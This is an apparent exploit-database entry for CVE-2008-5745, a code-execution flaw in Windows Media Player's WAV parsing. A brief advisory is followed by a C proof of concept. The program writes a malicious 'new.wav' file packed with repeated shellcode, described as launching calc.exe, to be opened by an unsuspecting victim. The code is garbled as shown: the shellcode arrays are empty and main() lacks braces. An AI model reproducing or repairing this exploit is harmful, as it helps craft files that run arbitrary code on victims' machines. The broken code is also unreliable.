Microsoft Windows Media Player 9/10/11 - '.WAV' File Parsing Code Execution

Related Vulnerabilities: CVE-2008-5745  
Publish Date: 29 Dec 2008
Author: anonymous


Microsoft Windows Media Player is prone to a code-execution vulnerability.

An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file with the vulnerable application. A successful exploit will allow arbitrary code to run in the context of the user running the application. 

#include <stdio.h>

int main()
/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=138 Encoder=None */
unsigned char scode[] =

unsigned char begincode[] =

    FILE *f;
    f = _fsopen("new.wav", "w+", 0);
    fwrite(begincode, sizeof(scode), 1, f);
    for (int i=0; i<20000; i++)
         fwrite(scode, sizeof(scode), 1, f);
    return 0;